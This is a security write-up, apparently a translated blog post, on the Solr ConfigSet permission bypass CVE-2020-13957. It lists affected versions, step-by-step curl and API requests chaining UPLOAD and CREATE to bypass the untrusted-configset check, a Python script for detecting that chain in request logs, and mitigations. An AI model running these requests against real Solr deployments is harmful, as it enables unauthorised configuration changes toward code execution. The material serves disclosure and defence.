[CVE-2020-13957] Solr configset permission bypass vulnerability

Affected versions

  • 6.6.0 to 6.6.5
  • 7.0.0 to 7.7.3
  • 8.0.0 to 8.6.2

Vulnerability description

Solr originally blocked certain dangerous features (ones that could lead to RCE) from being used in a configuration uploaded through the ConfigSet API. This restriction can be bypassed by combining the two actions UPLOAD and CREATE.

Original advisory text

Solr prevents some features considered dangerous (which could be used for remote code execution) from being configured in a ConfigSet that is uploaded via the API without authentication/authorization. The checks in place to prevent such features can be circumvented by using a combination of UPLOAD/CREATE actions.

Exploit conditions

  • The Solr API has no authentication
  • Solr is running in SolrCloud mode (Standalone mode does not provide the ConfigSet API)

Upload a Configset

The upload action is enabled by default, unless the following JVM parameter is set:

-Dconfigset.upload.enabled=false

Vulnerability principle:

A configset uploaded directly via UPLOAD cannot normally be used to create a collection; attempting to do so produces this error:

The configset for this collection was uploaded without any authentication in place, and use of <lib> is not available for collections with untrusted configsets. To use this component, re-upload the configset after enabling authentication and authorization.

But if we UPLOAD first and then use CREATE to derive a new configset from the uploaded one, a collection created from the derived configset bypasses this restriction:

The effect achieved is that you can customize the configset and then create a malicious collection based on it. I have not yet worked out how to make good use of this custom configuration to achieve RCE; I only know the earlier template injection, but that has version restrictions, right?

Steps:

1. [UPLOAD] Prepare the malicious configuration, package it and upload it

 # First package the configuration as a zip
 (cd solr/server/solr/configsets/sample_techproducts_configs/conf && zip -r - *) > db-configset.zip

 # Then upload the zip through the upload API
 curl -X POST --header "Content-Type:application/octet-stream" --data-binary @db-configset.zip "http://localhost:8983/solr/admin/configs?action=UPLOAD&name=db-configset"

2. [CREATE] Create a new configset based on the uploaded one, bypassing the restriction that a collection cannot be created directly from an UPLOADed configset

/solr/admin/configs?action=CREATE&name=db-configset1&baseConfigSet=db-configset&configSetProp.immutable=false&wt=xml&omitHeader=true

3. [LIST] List the configsets to confirm that the new configset has been generated

/solr/admin/configs?action=LIST&omitHeader=true

4. Create the malicious collection from the configset obtained via CREATE

/solr/admin/collections?action=CREATE&numShards=1&name=coll_test1&collection.configName=db-configset1

5. Exploit it using the earlier vulnerability?
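From the detection side, the chain above leaves a recognisable trace in Solr's request log: an UPLOAD of configset N, a configs CREATE with baseConfigSet=N, then a collections CREATE whose collection.configName is the derived configset. The following Python check, added here and not part of the original post, correlates those three requests; the request list is a constructed stand-in for the path-and-query part of a Solr access log.

```python
from urllib.parse import urlsplit, parse_qs

# Constructed sample request log entries (path + query only); not from the original post.
SAMPLE_REQUESTS = [
    "/solr/admin/configs?action=UPLOAD&name=db-configset",
    "/solr/admin/configs?action=LIST&omitHeader=true",
    "/solr/admin/configs?action=CREATE&name=db-configset1&baseConfigSet=db-configset"
    "&configSetProp.immutable=false&wt=xml&omitHeader=true",
    "/solr/admin/collections?action=CREATE&numShards=1&name=coll_test1"
    "&collection.configName=db-configset1",
    # A benign collection built on the stock _default configset should not be flagged.
    "/solr/admin/collections?action=CREATE&numShards=1&name=coll_ok"
    "&collection.configName=_default",
]


def find_configset_bypass_chains(requests):
    """Return (collection, derived_configset, uploaded_configset) for every
    collection created from a configset that CREATE derived from an UPLOADed
    configset, i.e. the UPLOAD -> CREATE -> collection CREATE chain."""
    uploaded = set()   # configsets that arrived through action=UPLOAD (untrusted)
    derived = {}       # derived configset name -> uploaded parent name
    findings = []
    for req in requests:
        parts = urlsplit(req)
        # parse_qs keeps dotted keys such as collection.configName intact
        q = {k: v[0] for k, v in parse_qs(parts.query).items()}
        action = q.get("action", "").upper()
        if parts.path.endswith("/admin/configs"):
            if action == "UPLOAD" and "name" in q:
                uploaded.add(q["name"])
            elif action == "CREATE" and q.get("baseConfigSet") in uploaded:
                derived[q["name"]] = q["baseConfigSet"]
        elif parts.path.endswith("/admin/collections") and action == "CREATE":
            cfg = q.get("collection.configName")
            if cfg in derived:
                findings.append((q.get("name"), cfg, derived[cfg]))
    return findings


if __name__ == "__main__":
    for coll, cfg, parent in find_configset_bypass_chains(SAMPLE_REQUESTS):
        print(f"collection {coll} uses {cfg}, derived from UPLOADed configset {parent}")
```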

Remediation / mitigation

  • Disable the UPLOAD action, i.e. start Solr with -Dconfigset.upload.enabled=false
  • Enable authentication and authorization
  • Upgrade to 8.6.3 or later
  • If you cannot upgrade, try this patch: SOLR-14663
  • Use firewall rules for access control, and whitelist the hosts allowed to reach the Solr API

Note

Reference:
http://mail-archives.apache.org/mod_mbox/lucene-solr-user/201807.mbox/%3CCAPCX2-+jojXrWvPSPiBR_xwphdpk+yPM2HYLojX2rqRTKMGm9g@mail.gmail.com%3E

Solr can run in two modes: "Cloud" mode or "Standalone" mode.

In SolrCloud mode, you can create collections, but in Standalone mode, you can only create cores.

In Standalone mode the request returns HTTP 400. After shutting Solr down and restarting it in SolrCloud mode, the same request succeeds.

Appendix

Upload Configsets

 # First package the configuration as a zip
 (cd solr/server/solr/configsets/sample_techproducts_configs/conf && zip -r - *) > myconfigset.zip

 # Then upload the zip through the upload API
 curl -X POST --header "Content-Type:application/octet-stream" --data-binary @myconfigset.zip "http://localhost:8983/solr/admin/configs?action=UPLOAD&name=myConfigSet"

Create Configsets

Create a new configset based on the previously uploaded configset

  • name: the name of the new configset
  • baseConfigSet: the uploaded configset to base it on
  • configSetProp.immutable: set this to false

http://cqq.com:8983/solr/admin/configs?action=CREATE&name=myConfigSet1&baseConfigSet=myConfigSet&configSetProp.immutable=false&wt=xml&omitHeader=true

View Configsets:

http://cqq.com:8983/solr/admin/configs?action=LIST&omitHeader=true


Uploaded and created configsets are stored not on the file system but in ZooKeeper.

The Configsets API enables you to upload new configsets to ZooKeeper and to create and delete configsets while Solr is running in SolrCloud mode.

This API provides a way to upload configuration files to ZooKeeper and share the same set of configuration files between two or more collections.

Origin blog.csdn.net/caiqiiqi/article/details/109046187